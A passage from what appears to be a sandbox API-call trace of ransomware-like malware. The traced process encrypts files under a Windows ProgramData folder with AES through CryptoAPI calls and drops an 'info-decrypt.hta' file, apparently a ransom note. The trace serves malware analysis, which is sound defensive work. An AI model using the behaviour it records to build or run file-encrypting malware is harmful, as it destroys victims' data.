Stage\\Task\\{07deb856-fc6e-4fb9-8add-d8f2cf8722c9}\\wmp.ico", lpFilePart=0x0) returned 0x59 [0164.305] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x691f2b4) returned 1 [0164.305] GetFileAttributesExW (in: lpFileName="C:\\ProgramData\\Microsoft\\Device Stage\\Task\\{07deb856-fc6e-4fb9-8add-d8f2cf8722c9}\\wmp.ico" (normalized: "c:\\programdata\\microsoft\\device stage\\task\\{07deb856-fc6e-4fb9-8add-d8f2cf8722c9}\\wmp.ico"), fInfoLevelId=0x0, lpFileInformation=0x3908df4 | out: lpFileInformation=0x3908df4*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xd2d64214, ftCreationTime.dwHighDateTime=0x1ca0407, ftLastAccessTime.dwLowDateTime=0xd2d64214, ftLastAccessTime.dwHighDateTime=0x1ca0407, ftLastWriteTime.dwLowDateTime=0x7c219ec7, ftLastWriteTime.dwHighDateTime=0x1c9ea0e, nFileSizeHigh=0x0, nFileSizeLow=0x1b9f4)) returned 1 [0164.305] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x691f2b0) returned 1 [0164.306] GetFullPathNameW (in: lpFileName="C:\\ProgramData\\Microsoft\\Device Stage\\Task\\{07deb856-fc6e-4fb9-8add-d8f2cf8722c9}\\wmp.ico", nBufferLength=0x105, lpBuffer=0x691ecf4, lpFilePart=0x0 | out: lpBuffer="C:\\ProgramData\\Microsoft\\Device Stage\\Task\\{07deb856-fc6e-4fb9-8add-d8f2cf8722c9}\\wmp.ico", lpFilePart=0x0) returned 0x59 [0164.306] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x691f1e8) returned 1 [0164.306] CreateFileW (lpFileName="C:\\ProgramData\\Microsoft\\Device Stage\\Task\\{07deb856-fc6e-4fb9-8add-d8f2cf8722c9}\\wmp.ico" (normalized: "c:\\programdata\\microsoft\\device stage\\task\\{07deb856-fc6e-4fb9-8add-d8f2cf8722c9}\\wmp.ico"), dwDesiredAccess=0x80000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x100000, hTemplateFile=0x0) returned 0x428 [0164.306] GetFileType (hFile=0x428) returned 0x1 [0164.306] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x691f1e4) returned 1 [0164.306] GetFileType (hFile=0x428) returned 0x1 [0164.306] GetFileSize (in: hFile=0x428, lpFileSizeHigh=0x691f2f0 | out: lpFileSizeHigh=0x691f2f0*=0x0) returned 0x1b9f4 [0164.307] ReadFile (in: hFile=0x428, lpBuffer=0x47cfca8, nNumberOfBytesToRead=0x1b9f4, lpNumberOfBytesRead=0x691f29c, lpOverlapped=0x0 | out: lpBuffer=0x47cfca8*, lpNumberOfBytesRead=0x691f29c*=0x1b9f4, lpOverlapped=0x0) returned 1 [0164.709] CloseHandle (hObject=0x428) returned 1 [0164.709] CryptAcquireContextW (in: phProv=0x691f23c, szContainer=0x0, szProvider="Microsoft Enhanced RSA and AES Cryptographic Provider", dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0x691f23c*=0xb1e950) returned 1 [0164.721] CryptGenRandom (in: hProv=0xb1e950, dwLen=0x10, pbBuffer=0x35a1e64 | out: pbBuffer=0x35a1e64) returned 1 [0167.429] CryptImportKey (in: hProv=0xb1e950, pbData=0x36dbbe4, dwDataLen=0x2c, hPubKey=0x0, dwFlags=0x1, phKey=0x691f20c | out: phKey=0x691f20c*=0xb7f610) returned 1 [0167.430] CryptContextAddRef (hProv=0xb1e950, pdwReserved=0x0, dwFlags=0x0) returned 1 [0167.430] CryptContextAddRef (hProv=0xb1e950, pdwReserved=0x0, dwFlags=0x0) returned 1 [0167.430] CryptDuplicateKey (in: hKey=0xb7f610, pdwReserved=0x0, dwFlags=0x0, phKey=0x691f1fc | out: phKey=0x691f1fc*=0xb7f9d0) returned 1 [0167.430] CryptContextAddRef (hProv=0xb1e950, pdwReserved=0x0, dwFlags=0x0) returned 1 [0167.430] CryptSetKeyParam (hKey=0xb7f9d0, dwParam=0x4, pbData=0x36dbcc4*=0x1, dwFlags=0x0) returned 1 [0167.430] CryptSetKeyParam (hKey=0xb7f9d0, dwParam=0x1, pbData=0x36dbc90, dwFlags=0x0) returned 1 [0167.431] CryptEncrypt (in: hKey=0xb7f9d0, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x47eb6b8*, pdwDataLen=0x691f268*=0x1ba00, dwBufLen=0x1ba00 | out: pbData=0x47eb6b8*, pdwDataLen=0x691f268*=0x1ba00) returned 1 [0167.433] CryptEncrypt (in: hKey=0xb7f9d0, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x36dbcec*, pdwDataLen=0x691f270*=0x0, dwBufLen=0x10 | out: pbData=0x36dbcec*, pdwDataLen=0x691f270*=0x10) returned 1 [0167.434] CryptDestroyKey (hKey=0xb7f610) returned 1 [0167.434] CryptReleaseContext (hProv=0xb1e950, dwFlags=0x0) returned 1 [0167.434] CryptReleaseContext (hProv=0xb1e950, dwFlags=0x0) returned 1 [0167.435] GetFullPathNameW (in: lpFileName="C:\\ProgramData\\Microsoft\\Device Stage\\Task\\{07deb856-fc6e-4fb9-8add-d8f2cf8722c9}\\wmp.ico", nBufferLength=0x105, lpBuffer=0x691ece0, lpFilePart=0x0 | out: lpBuffer="C:\\ProgramData\\Microsoft\\Device Stage\\Task\\{07deb856-fc6e-4fb9-8add-d8f2cf8722c9}\\wmp.ico", lpFilePart=0x0) returned 0x59 [0167.435] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x691f1d4) returned 1 [0167.435] CreateFileW (lpFileName="C:\\ProgramData\\Microsoft\\Device Stage\\Task\\{07deb856-fc6e-4fb9-8add-d8f2cf8722c9}\\wmp.ico" (normalized: "c:\\programdata\\microsoft\\device stage\\task\\{07deb856-fc6e-4fb9-8add-d8f2cf8722c9}\\wmp.ico"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x100000, hTemplateFile=0x0) returned 0xffffffff [0167.640] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x691e010) returned 1 [0167.640] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x691f33c) returned 1 [0167.641] GetFullPathNameW (in: lpFileName="C:\\ProgramData\\Microsoft\\Device Stage\\Task\\{07deb856-fc6e-4fb9-8add-d8f2cf8722c9}\\en-US", nBufferLength=0x105, lpBuffer=0x691ee44, lpFilePart=0x0 | out: lpBuffer="C:\\ProgramData\\Microsoft\\Device Stage\\Task\\{07deb856-fc6e-4fb9-8add-d8f2cf8722c9}\\en-US", lpFilePart=0x0) returned 0x57 [0167.641] GetFullPathNameW (in: lpFileName="C:\\ProgramData\\Microsoft\\Device Stage\\Task\\{07deb856-fc6e-4fb9-8add-d8f2cf8722c9}\\en-US\\", nBufferLength=0x105, lpBuffer=0x691ee18, lpFilePart=0x0 | out: lpBuffer="C:\\ProgramData\\Microsoft\\Device Stage\\Task\\{07deb856-fc6e-4fb9-8add-d8f2cf8722c9}\\en-US\\", lpFilePart=0x0) returned 0x58 [0167.641] FindFirstFileW (in: lpFileName="C:\\ProgramData\\Microsoft\\Device Stage\\Task\\{07deb856-fc6e-4fb9-8add-d8f2cf8722c9}\\en-US\\*", lpFindFileData=0x691f064 | out: lpFindFileData=0x691f064*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x1d91b669, ftCreationTime.dwHighDateTime=0x1cbf8ea, ftLastAccessTime.dwLowDateTime=0x22f23962, ftLastAccessTime.dwHighDateTime=0x1cbf8ea, ftLastWriteTime.dwLowDateTime=0x1d91b669, ftLastWriteTime.dwHighDateTime=0x1cbf8ea, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0xb7f250 [0167.642] FindNextFileW (in: hFindFile=0xb7f250, lpFindFileData=0x691f074 | out: lpFindFileData=0x691f074*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x1d91b669, ftCreationTime.dwHighDateTime=0x1cbf8ea, ftLastAccessTime.dwLowDateTime=0x22f23962, ftLastAccessTime.dwHighDateTime=0x1cbf8ea, ftLastWriteTime.dwLowDateTime=0x1d91b669, ftLastWriteTime.dwHighDateTime=0x1cbf8ea, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 1 [0167.642] FindNextFileW (in: hFindFile=0xb7f250, lpFindFileData=0x691f074 | out: lpFindFileData=0x691f074*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x932b6af, ftCreationTime.dwHighDateTime=0x1cbf8ea, ftLastAccessTime.dwLowDateTime=0x95b44f8, ftLastAccessTime.dwHighDateTime=0x1cbf8ea, ftLastWriteTime.dwLowDateTime=0x932b6af, ftLastWriteTime.dwHighDateTime=0x1cbf8ea, nFileSizeHigh=0x0, nFileSizeLow=0x536, dwReserved0=0x0, dwReserved1=0x0, cFileName="resource.xml", cAlternateFileName="")) returned 1 [0167.642] FindNextFileW (in: hFindFile=0xb7f250, lpFindFileData=0x691f074 | out: lpFindFileData=0x691f074*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="", cAlternateFileName="")) returned 0 [0167.642] FindClose (in: hFindFile=0xb7f250 | out: hFindFile=0xb7f250) returned 1 [0167.642] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x691f2fc) returned 1 [0167.642] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x691f308) returned 1 [0167.642] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x691f33c) returned 1 [0167.642] GetFullPathNameW (in: lpFileName="C:\\ProgramData\\Microsoft\\Device Stage\\Task\\{07deb856-fc6e-4fb9-8add-d8f2cf8722c9}\\en-US", nBufferLength=0x105, lpBuffer=0x691ee44, lpFilePart=0x0 | out: lpBuffer="C:\\ProgramData\\Microsoft\\Device Stage\\Task\\{07deb856-fc6e-4fb9-8add-d8f2cf8722c9}\\en-US", lpFilePart=0x0) returned 0x57 [0167.643] GetFullPathNameW (in: lpFileName="C:\\ProgramData\\Microsoft\\Device Stage\\Task\\{07deb856-fc6e-4fb9-8add-d8f2cf8722c9}\\en-US\\", nBufferLength=0x105, lpBuffer=0x691ee18, lpFilePart=0x0 | out: lpBuffer="C:\\ProgramData\\Microsoft\\Device Stage\\Task\\{07deb856-fc6e-4fb9-8add-d8f2cf8722c9}\\en-US\\", lpFilePart=0x0) returned 0x58 [0167.643] FindFirstFileW (in: lpFileName="C:\\ProgramData\\Microsoft\\Device Stage\\Task\\{07deb856-fc6e-4fb9-8add-d8f2cf8722c9}\\en-US\\*", lpFindFileData=0x691f064 | out: lpFindFileData=0x691f064*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x1d91b669, ftCreationTime.dwHighDateTime=0x1cbf8ea, ftLastAccessTime.dwLowDateTime=0x22f23962, ftLastAccessTime.dwHighDateTime=0x1cbf8ea, ftLastWriteTime.dwLowDateTime=0x1d91b669, ftLastWriteTime.dwHighDateTime=0x1cbf8ea, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0xb7f250 [0167.643] FindNextFileW (in: hFindFile=0xb7f250, lpFindFileData=0x691f074 | out: lpFindFileData=0x691f074*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x1d91b669, ftCreationTime.dwHighDateTime=0x1cbf8ea, ftLastAccessTime.dwLowDateTime=0x22f23962, ftLastAccessTime.dwHighDateTime=0x1cbf8ea, ftLastWriteTime.dwLowDateTime=0x1d91b669, ftLastWriteTime.dwHighDateTime=0x1cbf8ea, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 1 [0167.643] FindNextFileW (in: hFindFile=0xb7f250, lpFindFileData=0x691f074 | out: lpFindFileData=0x691f074*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x932b6af, ftCreationTime.dwHighDateTime=0x1cbf8ea, ftLastAccessTime.dwLowDateTime=0x95b44f8, ftLastAccessTime.dwHighDateTime=0x1cbf8ea, ftLastWriteTime.dwLowDateTime=0x932b6af, ftLastWriteTime.dwHighDateTime=0x1cbf8ea, nFileSizeHigh=0x0, nFileSizeLow=0x536, dwReserved0=0x0, dwReserved1=0x0, cFileName="resource.xml", cAlternateFileName="")) returned 1 [0167.643] FindNextFileW (in: hFindFile=0xb7f250, lpFindFileData=0x691f074 | out: lpFindFileData=0x691f074*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x932b6af, ftCreationTime.dwHighDateTime=0x1cbf8ea, ftLastAccessTime.dwLowDateTime=0x95b44f8, ftLastAccessTime.dwHighDateTime=0x1cbf8ea, ftLastWriteTime.dwLowDateTime=0x932b6af, ftLastWriteTime.dwHighDateTime=0x1cbf8ea, nFileSizeHigh=0x0, nFileSizeLow=0x536, dwReserved0=0x0, dwReserved1=0x0, cFileName="resource.xml", cAlternateFileName="")) returned 0 [0167.643] FindClose (in: hFindFile=0xb7f250 | out: hFindFile=0xb7f250) returned 1 [0167.644] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x691f2fc) returned 1 [0167.644] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x691f308) returned 1 [0167.644] GetFullPathNameW (in: lpFileName="C:\\ProgramData\\Microsoft\\Device Stage\\Task\\{07deb856-fc6e-4fb9-8add-d8f2cf8722c9}\\en-US\\resource.xml", nBufferLength=0x105, lpBuffer=0x691edb0, lpFilePart=0x0 | out: lpBuffer="C:\\ProgramData\\Microsoft\\Device Stage\\Task\\{07deb856-fc6e-4fb9-8add-d8f2cf8722c9}\\en-US\\resource.xml", lpFilePart=0x0) returned 0x64 [0167.644] GetFullPathNameW (in: lpFileName="C:\\ProgramData\\Microsoft\\Device Stage\\Task\\{07deb856-fc6e-4fb9-8add-d8f2cf8722c9}\\en-US\\info-decrypt.hta", nBufferLength=0x105, lpBuffer=0x691edb8, lpFilePart=0x0 | out: lpBuffer="C:\\ProgramData\\Microsoft\\Device Stage\\Task\\{07deb856-fc6e-4fb9-8add-d8f2cf8722c9}\\en-US\\info-decrypt.hta", lpFilePart=0x0) returned 0x68 [0167.644] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x691f218) returned 1 [0167.644] GetFileAttributesExW (in: lpFileName="C:\\ProgramData\\Microsoft\\Device Stage\\Task\\{07deb856-fc6e-4fb9-8add-d8f2cf8722c9}\\en-US\\info-decrypt.hta" (normalized: "c:\\programdata\\microsoft\\device stage\\task\\{07deb856-fc6e-4fb9-8add-d8f2cf8722c9}\\en-us\\info-decrypt.hta"), fInfoLevelId=0x0, lpFileInformation=0x691f294 | out: lpFileInformation=0x691f294*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0)) returned 0 [0167.644] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x691f214) returned 1 [0167.644] GetFullPathNameW (in: lpFileName="C:\\ProgramData\\Microsoft\\Device Stage\\Task\\{07deb856-fc6e-4fb9-8add-d8f2cf8722c9}\\en-US\\resource.xml", nBufferLength=0x105, lpBuffer=0x691edb0, lpFilePart=0x0 | out: lpBuffer="C:\\ProgramData\\Microsoft\\Device Stage\\Task\\{07deb856-fc6e-4fb9-8add-d8f2cf8722c9}\\en-US\\resource.xml", lpFilePart=0x0) returned 0x64 [0167.644] GetFullPathNameW (in: lpFileName="C:\\ProgramData\\Microsoft\\Device Stage\\Task\\{07deb856-fc6e-4fb9-8add-d8f2cf8722c9}\\en-US\\info-decrypt.hta", nBufferLength=0x105, lpBuffer=0x691ec58, lpFilePart=0x0 | out: lpBuffer="C:\\ProgramData\\Microsoft\\Device Stage\\Task\\{07deb856-fc6e-4fb9-8add-d8f2cf8722c9}\\en-US\\info-decrypt.hta", lpFilePart=0x0) returned 0x68 [0167.644] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x691f14c) returned 1 [0167.644] CreateFileW (lpFileName="C:\\ProgramData\\Microsoft\\Device Stage\\Task\\{07deb856-fc6e-4fb9-8add-d8f2cf8722c9}\\en-US\\info-decrypt.hta" (normalized: "c:\\programdata\\microsoft\\device stage\\task\\{07deb856-fc6e-4fb9-8add-d8f2cf8722c9}\\en-us\\info-decrypt.hta"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x8100000, hTemplateFile=0x0) returned 0x5a0 [0167.645] GetFileType (hFile=0x5a0) returned 0x1 [0167.645] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x691f148) returned 1 [0167.645] GetFileType (hFile=0x5a0) returned 0x1 [0167.645] WriteFile (in: hFile=0x5a0, lpBuffer=0x378f5dc*, nNumberOfBytesToWrite=0x1000, lpNumberOfBytesWritten=0x691f210, lpOverlapped=0x0 | out: lpBuffer=0x378f5dc*, lpNumberOfBytesWritten=0x691f210*=0x1000, lpOverlapped=0x0) returned 1 [0167.647] WriteFile (in: hFile=0x5a0, lpBuffer=0x378f5dc*, nNumberOfBytesToWrite=0x55e, lpNumberOfBytesWritten=0x691f1e4, lpOverlapped=0x0 | out: lpBuffer=0x378f5dc*, lpNumberOfBytesWritten=0x691f1e4*=0x55e, lpOverlapped=0x0) returned 1 [0167.647] CloseHandle (hObject=0x5a0) returned 1 [0167.647] GetFullPathNameW (in: lpFileName="C:\\ProgramData\\Microsoft\\Device Stage\\Task\\{07deb856-fc6e-4fb9-8add-d8f2cf8722c9}\\en-US\\resource.xml", nBufferLength=0x105, lpBuffer=0x691edb8, lpFilePart=0x0 | out: lpBuffer="C:\\ProgramData\\Microsoft\\Device Stage\\Task\\{07deb856-fc6e-4fb9-8add-d8f2cf8722c9}\\en-US\\resource.xml", lpFilePart=0x0) returned 0x64 [0167.647] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x691f264) returned 1 [0167.648] GetFileAttributesExW (in: lpFileName="C:\\ProgramData\\Microsoft\\Device Stage\\Task\\{07deb856-fc6e-4fb9-8add-d8f2cf8722c9}\\en-US\\resource.xml" (normalized: "c:\\programdata\\microsoft\\device stage\\task\\{07deb856-fc6e-4fb9-8add-d8f2cf8722c9}\\en-us\\resource.xml"), fInfoLevelId=0x0, lpFileInformation=0x37905f8 | out: lpFileInformation=0x37905f8*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x932b6af, ftCreationTime.dwHighDateTime=0x1cbf8ea, ftLastAccessTime.dwLowDateTime=0x95b44f8, ftLastAccessTime.dwHighDateTime=0x1cbf8ea, ftLastWriteTime.dwLowDateTime=0x932b6af, ftLastWriteTime.dwHighDateTime=0x1cbf8ea, nFileSizeHigh=0x0, nFileSizeLow=0x536)) returned 1 [0167.648] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x691f260) returned 1 [0167.648] GetFullPathNameW (in: lpFileName="C:\\ProgramData\\Microsoft\\Device Stage\\Task\\{07deb856-fc6e-4fb9-8add-d8f2cf8722c9}\\en-US\\resource.xml", nBufferLength=0x105, lpBuffer=0x691eca4, lpFilePart=0x0 | out: lpBuffer="C:\\ProgramData\\Microsoft\\Device Stage\\Task\\{07deb856-fc6e-4fb9-8add-d8f2cf8722c9}\\en-US\\resource.xml", lpFilePart=0x0) returned 0x64 [0167.648] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x691f198) returned 1 [0167.648] CreateFileW (lpFileName="C:\\ProgramData\\Microsoft\\Device Stage\\Task\\{07deb856-fc6e-4fb9-8add-d8f2cf8722c9}\\en-US\\resource.xml" (normalized: "c:\\programdata\\microsoft\\device stage\\task\\{07deb856-fc6e-4fb9-8add-d8f2cf8722c9}\\en-us\\resource.xml"), dwDesiredAccess=0x80000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x100000, hTemplateFile=0x0) returned 0x5a0 [0167.648] GetFileType (hFile=0x5a0) returned 0x1 [0167.648] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x691f194) returned 1 [0167.648] GetFileType (hFile=0x5a0) returned 0x1 [0167.648] GetFileSize (in: hFile=0x5a0, lpFileSizeHigh=0x691f2a0 | out: lpFileSizeHigh=0x691f2a0*=0x0) returned 0x536 [0167.648] ReadFile (in: hFile=0x5a0, lpBuffer=0x3790dcc, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x691f24c, lpOverlapped=0x0 | out: lpBuffer=0x3790dcc*, lpNumberOfBytesRead=0x691f24c*=0x536, lpOverlapped=0x0) returned 1 [0167.650] CloseHandle (hObject=0x5a0) returned 1 [0167.651] CryptAcquireContextW (in: phProv=0x691f1ec, szContainer=0x0, szProvider="Microsoft Enhanced RSA and AES Cryptographic Provider", dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0x691f1ec*=0x66ba520) returned 1 [0167.652] CryptGenRandom (in: hProv=0x66ba520, dwLen=0x10, pbBuffer=0x3792120 | out: pbBuffer=0x3792120) returned 1 [0169.505] CryptImportKey (in: hProv=0x66ba520, pbData=0x373b1cc, dwDataLen=0x2c, hPubKey=0x0, dwFlags=0x1, phKey=0x691f1bc | out: phKey=0x691f1bc*=0xb7f9d0) returned 1 [0169.505] CryptContextAddRef (hProv=0x66ba520, pdwReserved=0x0, dwFlags=0x0) returned 1 [0169.505] CryptContextAddRef (hProv=0x66ba520, pdwReserved=0x0, dwFlags=0x0) returned 1 [0169.505] CryptDuplicateKey (in: hKey=0xb7f9d0, pdwReserved=0x0, dwFlags=0x0, phKey=0x691f1ac | out: phKey=0x691f1ac*=0xb7f6d0) returned 1 [0169.505] CryptContextAddRef (hProv=0x66ba520, pdwReserved=0x0, dwFlags=0x0) returned 1 [0169.505] CryptSetKeyParam (hKey=0xb7f6d0, dwParam=0x4, pbData=0x373b2ac*=0x1, dwFlags=0x0) returned 1 [0169.505] CryptSetKeyParam (hKey=0xb7f6d0, dwParam=0x1, pbData=0x373b278, dwFlags=0x0) returned 1 [0169.505] CryptEncrypt (in: hKey=0xb7f6d0, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x373b2bc*, pdwDataLen=0x691f218*=0x540, dwBufLen=0x540 | out: pbData=0x373b2bc*, pdwDataLen=0x691f218*=0x540) returned 1 [0169.505] CryptEncrypt (in: hKey=0xb7f6d0, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x373b820*, pdwDataLen=0x691f220*=0x0, dwBufLen=0x10 | out: pbData=0x373b820*, pdwDataLen=0x691f220*=0x10) returned 1 [0169.506] CryptDestroyKey (hKey=0xb7f9d0) returned 1 [0169.506] CryptReleaseContext (hProv=0x66ba520, dwFlags=0x0) returned 1 [0169.506] CryptReleaseContext (hProv=0x66ba520, dwFlags=0x0) returned 1 [0169.506] GetFullPathNameW (in: lpFileName="C:\\ProgramData\\Microsoft\\Device Stage\\Task\\{07deb856-fc6e-4fb9-8add-d8f2cf8722c9}\\en-US\\resource.xml", nBufferLength=0x105, lpBuffer=0x691ec90, lpFilePart=0x0 | out: lpBuffer="C:\\ProgramData\\Microsoft\\Device Stage\\Task\\{07deb856-fc6e-4fb9-8add-d8f2cf8722c9}\\en-US\\resource.xml", lpFilePart=0x0) returned 0x64 [0169.507] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x691f184) returned 1 [0169.507] CreateFileW (lpFileName="C:\\ProgramData\\Microsoft\\Device Stage\\Task\\{07deb856-fc6e-4fb9-8add-d8f2cf8722c9}\\en-US\\resource.xml" (normalized: "c:\\programdata\\microsoft\\device stage\\task\\{07deb856-fc6e-4fb9-8add-d8f2cf8722c9}\\en-us\\resource.xml"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x100000, hTemplateFile=0x0) returned 0xffffffff [0169.508] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x691dfc0) returned 1 [0169.508] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x691f38c) returned 1 [0169.508] GetFullPathNameW (in: lpFileName="C:\\ProgramData\\Microsoft\\Device Stage\\Task\\{e35be42d-f742-4d96-a50a-1775fb1a7a42}", nBufferLength=0x105, lpBuffer=0x691ee94, lpFilePart=0x0 | out: lpBuffer="C:\\ProgramData\\Microsoft\\Device Stage\\Task\\{e35be42d-f742-4d96-a50a-1775fb1a7a42}", lpFilePart=0x0) returned 0x51 [0169.508] GetFullPathNameW (in: lpFileName="C:\\ProgramData\\Microsoft\\Device Stage\\Task\\{e35be42d-f742-4d96-a50a-1775fb1a7a42}\\", nBufferLength=0x105, lpBuffer=0x691ee68, lpFilePart=0x0 | out: lpBuffer="C:\\ProgramData\\Microsoft\\Device Stage\\Task\\{e35be42d-f742-4d96-a50a-1775fb1a7a42}\\", lpFilePart=0x0) returned 0x52 [0169.508] FindFirstFileW (in: lpFileName="C:\\ProgramData\\Microsoft\\Device Stage\\Task\\{e35be42d-f742-4d96-a50a-1775fb1a7a42}\\*", lpFindFileData=0x691f0b4 | out: lpFindFileData=0x691f0b4*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xfd98f9f8, ftCreationTime.dwHighDateTime=0x1ca0431, ftLastAccessTime.dwLowDateTime=0x1d91b669, ftLastAccessTime.dwHighDateTime=0x1cbf8ea, ftLastWriteTime.dwLowDateTime=0x1d91b669, ftLastWriteTime.dwHighDateTime=0x1cbf8ea, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0xb7f4d0 [0169.593] FindNextFileW (in: hFindFile=0xb7f4d0, lpFindFileData=0x691f0c4 | out: lpFindFileData=0x691f0c4*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xfd98f9f8, ftCreationTime.dwHighDateTime=0x1ca0431, ftLastAccessTime.dwLowDateTime=0x1d91b669, ftLastAccessTime.dwHighDateTime=0x1cbf8ea, ftLastWriteTime.dwLowDateTime=0x1d91b669, ftLastWriteTime.dwHighDateTime=0x1cbf8ea, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 1 [0169.594] FindNextFileW (in: hFindFile=0xb7f4d0, lpFindFileData=0x691f0c4 | out: lpFindFileData=0x691f0c4*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x1d91b669, ftCreationTime.dwHighDateTime=0x1cbf8ea, ftLastAccessTime.dwLowDateTime=0x22f23962, ftLastAccessTime.dwHighDateTime=0x1cbf8ea, ftLastWriteTime.dwLowDateTime=0x1d91b669, ftLastWriteTime.dwHighDateTime=0x1cbf8ea, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="en-US", cAlternateFileName="")) returned 1 [0169.594] FindNextFileW (in: hFindFile=0xb7f4d0, lpFindFileData=0x691f0c4 | out: lpFindFileData=0x691f0c4*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x5f15ee9d, ftCreationTime.dwHighDateTime=0x1ca040c, ftLastAccessTime.dwLowDateTime=0x5f15ee9d, ftLastAccessTime.dwHighDateTime=0x1ca040c, ftLastWriteTime.dwLowDateTime=0xc78a2eab, ftLastWriteTime.dwHighDateTime=0x1c9ea0e, nFileSizeHigh=0x0, nFileSizeLow=0xd0a3, dwReserved0=0x0, dwReserved1=0x0, cFileName="folder.ico", cAlternateFileName="")) returned 1 [0169.594] FindNextFileW (in: hFindFile=0xb7f4d0, lpFindFileData=0x691f0c4 | out: lpFindFileData=0x691f0c4*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x5f0eca86, ftCreationTime.dwHighDateTime=0x1ca040c, ftLastAccessTime.dwLowDateTime=0x5f0eca86, ftLastAccessTime.dwHighDateTime=0x1ca040c, ftLastWriteTime.dwLowDateTime=0xc78c9009, ftLastWriteTime.dwHighDateTime=0x1c9ea0e, nFileSizeHigh=0x0, nFileSizeLow=0xe3c8, dwReserved0=0x0, dwReserved1=0x0, cFileName="print_pref.ico", cAlternateFileName="")) returned 1 [0169.594] FindNextFileW (in: hFindFile=0xb7f4d0, lpFindFileData=0x691f0c4 | out: lpFindFileData=0x691f0c4*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x5f0eca86, ftCreationTime.dwHighDateTime=0x1ca040c, ftLastAccessTime.dwLowDateTime=0x5f0eca86, ftLastAccessTime.dwHighDateTime=0x1ca040c, ftLastWriteTime.dwLowDateTime=0xc78c9009, ftLastWriteTime.dwHighDateTime=0x1c9ea0e, nFileSizeHigh=0x0, nFileSizeLow=0xebb8, dwReserved0=0x0, dwReserved1=0x0, cFileName="print_property.ico", cAlternateFileName="")) returned 1 [0169.594] FindNextFileW (in: hFindFile=0xb7f4d0, lpFindFileData=0x691f0c4 | out: lpFindFileData=0x691f0c4*(dwFileAttributes=0x20, 